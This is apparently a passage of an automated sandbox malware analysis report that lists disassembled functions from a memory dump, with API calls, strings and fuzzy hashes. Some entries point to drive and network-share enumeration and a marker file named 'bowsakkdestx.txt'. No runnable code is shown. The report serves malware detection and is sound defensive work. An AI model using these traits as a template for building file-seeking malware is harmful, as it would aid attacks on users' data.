_strlen.LIBCMT ref: 0042708B
DecodePointer.KERNEL32(?,?,?,?,000000FF,?,?,00463083,?,00000000,00000000), ref: 004271FE
DecodePointer.KERNEL32(?,?), ref: 0042722A
DecodePointer.KERNEL32(?,?), ref: 0042724F
__aulldvrm.LIBCMT ref: 00427385
_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: DecodePointer_write_multi_char$_write_string$__aulldvrm__cftof_free_strlen
String ID:
API String ID: 1678825546-0
Opcode ID: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
Instruction ID: 52db3c5ac710bcba984e77d884e21c03200a6a5045cf61879664ec27deebefdc
Opcode Fuzzy Hash: 589e2253d7d99ae0dcbf429e34422fb1402ab038db5a2f2b80cba858938edee3
Instruction Fuzzy Hash: 27718471F092399BDF30DA58EC98BAAB7B5EF54314F5440DAD908A6241D7389EC0CF58

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

, xrefs: 00457482
0123456789abcdef, xrefs: 004574C4
0123456789ABCDEF, xrefs: 004574D6
+, xrefs: 00457475
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Function 004273EA Relevance: 10.6, APIs: 7, Instructions: 129COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _write_multi_char$_write_string$__cftof_free
String ID:
API String ID: 2964551433-0
Opcode ID: 24375c1184f10fff9f69e53d20d398cf7003ebcd556f5164746207377439a35e
Instruction ID: 6e53a8d943180cd312645f9ab6be848b87d00e26e6c43e5a6b33f09903c19296
Opcode Fuzzy Hash: 24375c1184f10fff9f69e53d20d398cf7003ebcd556f5164746207377439a35e
Instruction Fuzzy Hash: AA515771F09139AFDF309A54DC99BAAB7B5EF04304F4400DAD908A6251D7799F80CF59

Function 004273FA Relevance: 10.6, APIs: 7, Instructions: 127COMMON

Download Yara Rule

APIs

_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _write_multi_char$_write_string$__cftof_free
String ID:
API String ID: 2964551433-0
Opcode ID: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
Instruction ID: 8198ec34aa8999dc590647716f2dc488f85491d7af5cc04cf74bf98b0f8c793f
Opcode Fuzzy Hash: 9184f045ad01bb42410d4e7ab6faa150617f92114e0b0a62860346184688369c
Instruction Fuzzy Hash: F2514471F05139AEDF309A68DC99BAAB7B5EF04304F4400DAE908A6251E7399F80CF59

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
DispatchMessageW.USER32(?), ref: 00411B5C
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00425141

Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1

__mtinitlocks.LIBCMT ref: 00425146
__mtterm.LIBCMT ref: 0042514F

Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B

__calloc_crt.LIBCMT ref: 00425174
__initptd.LIBCMT ref: 00425196
GetCurrentThreadId.KERNEL32 ref: 0042519D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C

Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0042594A

Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22

_free.LIBCMT ref: 00425970

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

__lock.LIBCMT ref: 00425989
___removelocaleref.LIBCMT ref: 00425998
___freetlocinfo.LIBCMT ref: 004259B1
_free.LIBCMT ref: 004259C4

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

lib(%lu), xrefs: 0045071C
func(%lu), xrefs: 00450734
reason(%lu), xrefs: 00450758
error:%08lX:%s:%s:%s, xrefs: 00450792

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D
.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Function 004C5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__get_sys_err_msg.LIBCMT ref: 004C5DCD

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3123740607-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463097
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084
phrase is too short, needs to be at least %d chars, xrefs: 00463070

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON

Download Yara Rule

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Function 004416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
String ID:
API String ID: 2168648987-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043B70B

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: HeapAlloc.KERNEL32(006E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_free.LIBCMT ref: 0043B71E

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
Opcode Fuzzy Hash: ac30be484878ed1c1fbcd2781803b0d6d497061a6a5de6108b0294a208768cdb
Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC

Function 0041F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
DispatchMessageW.USER32(?), ref: 0041F0B6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98

Function 0041E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
DispatchMessageW.USER32(?), ref: 0041E546
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchObjectPostSingleThreadWait
String ID:
API String ID: 1380987712-0
Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
